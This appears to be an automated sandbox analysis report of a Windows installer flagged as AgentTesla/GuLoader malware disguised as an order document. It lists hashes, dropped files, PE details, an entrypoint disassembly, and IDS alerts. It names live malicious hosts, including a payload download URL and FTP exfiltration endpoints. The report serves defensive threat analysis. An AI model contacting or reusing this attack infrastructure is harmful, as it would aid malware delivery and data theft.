11:50:46	Task Scheduler	Run new task: {3B0271B5-B01A-4794-82E4-9906C26952B4} path:

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.33.55.26	Objedn#U00e1vka_20248481119000903.img	Get hash	malicious	AgentTesla, GuLoader	Browse	akonnyuszerkezet.hu/image-temp/prkaeoKWqORQXnyaAAmokgBr233.bin
185.33.55.26	FLITTIGL.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	romstal-hungary.hu//MIzSja40.bin
86.107.36.93	Objedn#U00e1vka_20248481119000903.img	Get hash	malicious	AgentTesla, GuLoader	Browse
	Amalgamers.exe	Get hash	malicious	AgentTesla	Browse
	FLITTIGL.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Rendeles_110078670008860000002.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	Rendeles_1100786700088673955430.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	wzjEaheCBP.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	4MQ9rTK7AV.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	Doc22378670008869955430311.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	doc222378670008869955430341.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
akonnyuszerkezet.hu	Objedn#U00e1vka_20248481119000903.img	Get hash	malicious	AgentTesla, GuLoader	Browse	185.33.55.26
ftp.carbognin.it	Objedn#U00e1vka_20248481119000903.img	Get hash	malicious	AgentTesla, GuLoader	Browse	86.107.36.93
	Amalgamers.exe	Get hash	malicious	AgentTesla	Browse	86.107.36.93
	FLITTIGL.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	86.107.36.93
	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	86.107.36.93
	Rendeles_110078670008860000002.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	86.107.36.93
	Rendeles_1100786700088673955430.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	86.107.36.93
	wzjEaheCBP.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	86.107.36.93
	4MQ9rTK7AV.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	86.107.36.93
	Doc22378670008869955430311.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	86.107.36.93
	doc222378670008869955430341.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	86.107.36.93

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DIALTELECOMRO	meerkat.arm5.elf	Get hash	malicious	Mirai	Browse	89.47.221.99
	Objedn#U00e1vka_20248481119000903.img	Get hash	malicious	AgentTesla, GuLoader	Browse	86.107.36.93
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	188.240.230.166
	mpsl.elf	Get hash	malicious	Mirai	Browse	93.114.246.9
	#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe	Get hash	malicious	DBatLoader, FormBook	Browse	92.114.2.230
	Amalgamers.exe	Get hash	malicious	AgentTesla	Browse	86.107.36.93
	#U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd	Get hash	malicious	DBatLoader, FormBook	Browse	92.114.2.230
	FLITTIGL.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	86.107.36.93
	splppc.elf	Get hash	malicious	Unknown	Browse	188.209.98.177
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	93.114.114.57
SERVERGARDEN-ASServergardenKftHU	Objedn#U00e1vka_20248481119000903.img	Get hash	malicious	AgentTesla, GuLoader	Browse	185.33.55.26
	mips.elf	Get hash	malicious	Mirai	Browse	185.51.81.237
	FLITTIGL.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	185.33.55.26
	LPO 92558 & 92669.exe	Get hash	malicious	FormBook	Browse	185.33.52.20
	Wezwanie policji 0001308_24.docx.exe	Get hash	malicious	AgentTesla	Browse	185.33.54.1
	Express One #U00e9rtes#U00edt#U01511.exe	Get hash	malicious	AgentTesla	Browse	80.77.122.144
	LisectAVT_2403002A_41.exe	Get hash	malicious	GuLoader	Browse	185.33.54.3
	megerosites.cmd	Get hash	malicious	DBatLoader, Lokibot	Browse	185.33.54.13
	Swift copy.exe	Get hash	malicious	FormBook	Browse	185.33.52.20
	Uplata_391.cmd	Get hash	malicious	DBatLoader	Browse	185.33.54.13

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsm3A84.tmp\System.dll	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	lw2HMxuVuf.exe	Get hash	malicious	Unknown	Browse
	Setup.exe	Get hash	malicious	Unknown	Browse
	Setup.exe	Get hash	malicious	Unknown	Browse
	uu8v4UUzTU.exe	Get hash	malicious	Unknown	Browse
	uu8v4UUzTU.exe	Get hash	malicious	Unknown	Browse
	Setup.exe	Get hash	malicious	Unknown	Browse
	Setup.exe	Get hash	malicious	Unknown	Browse
	Setup.exe	Get hash	malicious	Unknown	Browse
	Setup.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsm3A84.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.814115788739565
Encrypted:	false
SSDEEP:	192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5:	CFF85C549D536F651D4FB8387F1976F2
SHA1:	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256:	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512:	531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: ZAMOWIEN.EXE.exe, Detection: malicious, Browse Filename: lw2HMxuVuf.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: uu8v4UUzTU.exe, Detection: malicious, Browse Filename: uu8v4UUzTU.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse
Reputation:	high, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsr3832.tmp

Download File

Process:	C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
File Type:	data
Category:	dropped
Size (bytes):	2714237
Entropy (8bit):	2.676439956704829
Encrypted:	false
SSDEEP:	12288:XdZ1laVl+7cVzst5g73O698WumZ0AY70TkXjONK2Lufw+zQ9L:NZ1lau7UstSNNVzY70T0jl2Lufp8L
MD5:	8D080A6B947B931126DF9624EE517960
SHA1:	648DA371FF2CA7439065045E6EF86BE315BBAA17
SHA-256:	E4AB057395F1F8D0DBC1EAFBB7C46DB26F0A912974AB09CDC084364F903751B3
SHA-512:	269C3B8FBBE5C2CEEFF75B77E5E2B7319F44FE9E8247097CFA00B53D80D5E0DA82230049EB765154D36AF7CCF000A50EE94FE4CB6575A578C7D0825885D7A1F9
Malicious:	false
Reputation:	low
Preview:	.@......,.......,.......D................?.......@..........................................................................................................................................................................................................................................G...W...............h...............................................................g...............................................................j...........................................................................................................................................t...........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\Inagglutinability.fug

Download File

Process:	C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
File Type:	data
Category:	dropped
Size (bytes):	443849
Entropy (8bit):	1.2497130148779307
Encrypted:	false
SSDEEP:	768:ac7PvH0g06m8EO44p5avB58Z4xunuY1TRicIrA/bjWGAgd+DArFLB+F0PNwhiV2y:Tnu+/YlZbezJVf975PexHNpRZwxM
MD5:	84FA0DD1B45FB180585F2E2F50699931
SHA1:	0A0463BE047F0429E8ECEE07C01B2CF1D5877C60
SHA-256:	2C121ED02B618293B4402E6B21F2C732BC94085EF655406349C39F31831D498C
SHA-512:	886AC6AE7EA0242F672D349E73804C24C4EF5406ECFDBAED52A96908BB32B719FAC804ABFA2F75D2C3C9B230C148881624938509BA012BC65CECAF963C9E7D28
Malicious:	false
Reputation:	low
Preview:	..................................................z........k...........................Z..............,.........9.1................o........X.X................z....i......................................f............S.....................................r..f.................E..........................R....q..............................................t............................b......................................................8.....................2..?..........................o..........................>..Z......^...........^.@............................].....V............................d...............................+......................................................................a%...............s...D.....................................`..........................G..................U....~i........._......^.................y........E..............L....................................k............................=;.....................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\Indbruddene.Obd

Download File

Process:	C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	446201
Entropy (8bit):	6.989655137691733
Encrypted:	false
SSDEEP:	12288:mdZ1laVl+7cVzst5g73O698WumZ0AY70TkXjON/:uZ1lau7UstSNNVzY70T0jo
MD5:	78A2CC4C1635FDF52E244C6B50B690E7
SHA1:	63CB7B1501FB000341DD107D383DE152F7E8B6A6
SHA-256:	7BE06E71697FC66CA273F2A26B249D9F9AB7D9A113CA0C1878DB8C4FEADF82B8
SHA-512:	AA1902F8D29F40BB5DD78A4FC7547C0BA133165F93E58DEDAF90FC381845B3BD99D6FC00F7164539DF405A2CBA7058D806A0C231FA287233DB67AD7F3174712F
Malicious:	false
Reputation:	low
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\bingy.uda

Download File

Process:	C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
File Type:	data
Category:	dropped
Size (bytes):	374366
Entropy (8bit):	1.2592280311366506
Encrypted:	false
SSDEEP:	1536:lsam/YZz1HsF/LIx4xzs+FxFWEYth0ZDmHmSwIHLh:yYXa8x4xzsbLmyHNLh
MD5:	63AB01179F7F08CB3FD31A84D307923E
SHA1:	FE08FC38C13FBD2B2D3FAC0ECB21A61FAC348909
SHA-256:	82C098CEE0901C5EAB36E7E58F5BE50BB6A4B730A1DCCE30868A6A070B7D7B0D
SHA-512:	5B5CCDBE1613BF6E0AD01568CF0730FA8E3782FF29A04FDE9EBA47FE9858E3827BE61582FB19B451DFA8FAE98D11A715458B114965FDAE58B6A0181D7D318E7E
Malicious:	false
Reputation:	low
Preview:	...u.....................................................................!.....M............................T.........1.................m.....=..............................................................C........`.._.E...................................................................5..........................................!.:.............................................................u.....5...................................b..........................................................................5.......h..........................[(........Q...............z................................................................D.......................................................................................................................................................................y..........,.................................>...V.........z................%..................................8.........................$......._...........................................:.....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\molge.gos

Download File

Process:	C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
File Type:	data
Category:	dropped
Size (bytes):	323702
Entropy (8bit):	1.2515537160589565
Encrypted:	false
SSDEEP:	768:EoZQ4ffHokStkE7R3fsPebnEzwBFK/UGxsF7zd3axJXZUJ9uSPHH+Xwxo4wAlU0I:Eo3ITfBkCnaS/HuAiNNo5mzagNT
MD5:	B80D0CB89FE7FA621981D8D20875C6F8
SHA1:	E9E5EFCC9A0BF3FCB96ED74300CB3EDA8824A903
SHA-256:	56F956599D7C9C0279244826EEF098087E0792D2DF9FCDEF56808096BB7171AD
SHA-512:	503B3CB4198976AF94D07938F8A74DA751CDABFEAD629FA84B50FA964E3AA7E5A9D9AEEC38A530B84EBC6CA835D453A65FBB4BE172BCC36F4B2F1716AC0AF45B
Malicious:	false
Preview:	..............................l..@..........\|.............................................................................................................................Hz.....!.................H......................E................................,...................................................................{..........................................w.............................Z.....&....................................................qJ.......T..........................................M<...............................o..........]..............h......_........................................................i............3........................................O..............................................i......6..............q.............e....'..............b...........................H........._..............................\........................................................C...=Q....\..t......................}...............&..M....t..<.........f..+..............

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\overissued.rei

Download File

Process:	C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
File Type:	data
Category:	dropped
Size (bytes):	327575
Entropy (8bit):	1.246488002290263
Encrypted:	false
SSDEEP:	768:u8Rnm6RqiOI7/5CnMuIXKM3+4MTe0vTGzJhhslmbnvlVD36APjFUNDVs1bcE8o48:RjXT6B6JmUDr5ahkRssMs7
MD5:	38662E787C7D317321B9352FE6269829
SHA1:	918FD791B9A00725BCD818648C25E5CBCEC3BC84
SHA-256:	0AD6E32AB10E80BCDB3474B904A369AF8E6EA7F78F7422D51843F43A4B0D8FF5
SHA-512:	7E707F205191ACF77966283832EE364D26CA14670C820CD7D51F2FC407521CEFD69EB17F04DEE6C75C58F47C3085F9D1707F0DEC4E81A40F67C1741C97E921B4
Malicious:	false
Preview:	.......7...................l...............................}............................................h......0....)..H..................7.......o..~...............................q............K..O...................................................................`.............o.........................~..........................Z....................-.....H............................................................U.............................................................y........................................................................)...............k......................................................................e........................0....................................;...............#.1....F................4...............w..-.......................j...........1.......................................................................'........................................A.......g..............O...............................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\ramessid.gla

Download File

Process:	C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
File Type:	data
Category:	dropped
Size (bytes):	456512
Entropy (8bit):	1.2553692946521524
Encrypted:	false
SSDEEP:	768:Nh0M1M+UE28IhUidpSGkmkNebfgnKMfExKsYzoi6tW0ySuHg3b38P8c34C7yzyEX:NqELXsuJHGCKoU1ilsGzaE7rE4zPBo
MD5:	417FD08AA77F114479B10D88872BF95E
SHA1:	1E4630475A91EA0DD64A136CADC446FA38649A41
SHA-256:	28B750C621DA76E80615C113A689BF77C32D81F5D4C5445A433206E0B3B2F0A4
SHA-512:	5079A3F462F38067CB572A43625C2B2D7EB98EB062459FE045408F3DDA3E68770EFB2BC78E12AD171E2B4AACE97AD753A440E9FFB0F7F8B59D3C01608BE7E288
Malicious:	false
Preview:	........z.....................................................................S.....................................................................................F...............^..................D..............................................................?.....................................I...............................[....................F.................A................................b.....`......................P............................,.................dr......W........5...@......................................_.................................b.........Z.............................................o...................p.........%..............+.............................#.......J................................................A...3..................U.................................................................H.............7....................B.....................$............*..{...........................v....q.......................j................x.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\triaxiality.gen

Download File

Process:	C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe
File Type:	data
Category:	dropped
Size (bytes):	313104
Entropy (8bit):	1.2523114527025023
Encrypted:	false
SSDEEP:	768:hCdYgMOEvuXzI1TjEbC35gF5MA2QF73GmDMi5BzXXhVVbD3507pldZytBoNpUq59:hXF0F5s82cHzHDZenqEfnpm+ijc2s
MD5:	60A38455325DF314A0421F85AF3DD490
SHA1:	5EDB899C3FDDB7F242573E9AFC9E92EB93C837FC
SHA-256:	4229532B012088022C28B2ADED22ACB76D8882061AD020135DD761A9FAB13090
SHA-512:	962B89FA92A239878C75AE702E3DEBA81A9353DDFD9E130AE4B7C4749FB6D859A0D3629F1F901B949B7E370C0BAA0024D6A92F7C2D7E656AED04219DED2568CC
Malicious:	false
Preview:	)....................P.....-.......8.....p...........o......G....................................Y..............................................r.........................................................................................................0...................................................B..............................B......................................,...................................................................................................0...............................................<...!.......................#......A.......g\|.............C...............................................H.....Y.....E............z..._..j.....e......._....A...f..............w/.......................................................................................Q............@....................................s............8................Z........c......Y.................3.....u........T..............3.............................................t................i......

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.576983775968187
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	rendel#U00e9s_1023200000000000305.exe
File size:	1'002'622 bytes
MD5:	ff83f495808f8837a41405726ce9d7b9
SHA1:	186bb042c4a61b7905ed62bde58f062725897192
SHA256:	186a1d9c4703d9498b26d88451e31018ff66b7f9f135e0ed93f9ac10aa485753
SHA512:	89112cc0a4b7349bbb9b9c2b2e466f895375ee099a27b6a497be3860414f9ad9d8ec87b0dd521e029fc4827ee1e1560b76e319e5b4ea12ac1b76986626f2ddca
SSDEEP:	24576:+YB//x9sjWsxFLFS8Tppg8bY6yEV+ztrHvm:j9//CWWTppm65wc
TLSH:	0B25123D34A1C132DDA885F2C921CEE06F9FAD04746457CF37926A1934F612D7A9A0FA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

File Icon


Icon Hash:	a41b39230387633e

Static PE Info

General

Entrypoint:	0x403640
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	61259b55b8912888e90f516ca08dc514

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A230h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080C8h]
mov esi, dword ptr [004080CCh]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007FA954B2752Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007FA954B274FAh
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [0042A318h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x54000	0x3a0c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6676	0x6800	6f5abe9eeda26ee84b3c1ed1a6c82001	False	0.6568134014423077	data	6.4174599871908855	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x139a	0x1400	8c5edfd8ff9cc0135e197611be38ca18	False	0.4498046875	data	5.141066817170598	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20378	0x600	4b2421975c21b032f7ea000f5e7f9fbf	False	0.509765625	data	4.110582127654237	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x29000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x54000	0x3a0c8	0x3a200	569952a4e5d0aa493a8c996f7131a879	False	0.41251260080645163	data	5.192863159411991	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x54460	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States	0.23623853211009174
RT_ICON	0x547c8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.2490388027919082
RT_ICON	0x64ff0	0xad6e	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9953151042839767
RT_ICON	0x6fd60	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.2721778431784738
RT_ICON	0x79208	0x67e8	Device independent bitmap graphic, 80 x 160 x 32, image size 26560	English	United States	0.28
RT_ICON	0x7f9f0	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.29500924214417745
RT_ICON	0x84e78	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.3113486065186585
RT_ICON	0x890a0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.3570539419087137
RT_ICON	0x8b648	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.43902439024390244
RT_ICON	0x8c6f0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.5020491803278688
RT_ICON	0x8d078	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5948581560283688
RT_DIALOG	0x8d4e0	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x8d628	0x13c	data	English	United States	0.5506329113924051
RT_DIALOG	0x8d768	0x100	data	English	United States	0.5234375
RT_DIALOG	0x8d868	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x8d988	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x8da50	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x8dab0	0x92	data	English	United States	0.7191780821917808
RT_VERSION	0x8db48	0x240	data	English	United States	0.5121527777777778
RT_MANIFEST	0x8dd88	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-09T11:51:18.116653+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49707	185.33.55.26	80	TCP
2024-12-09T11:51:25.411752+0100	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.5	49720	86.107.36.93	21	TCP
2024-12-09T11:51:26.587377+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.5	49728	86.107.36.93	35590	TCP
2024-12-09T11:51:26.708391+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.5	49728	86.107.36.93	35590	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 11:51:16.698937893 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:16.819375038 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:16.822705984 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:16.825259924 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:16.945446014 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.116560936 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.116574049 CET	80	49707	185.33.55.26	192.168.2.5
Dec 9, 2024 11:51:18.116652966 CET	49707	80	192.168.2.5	185.33.55.26
Dec 9, 2024 11:51:18.116704941 CET	80	49707	185.33.55.26	192.168.2.5
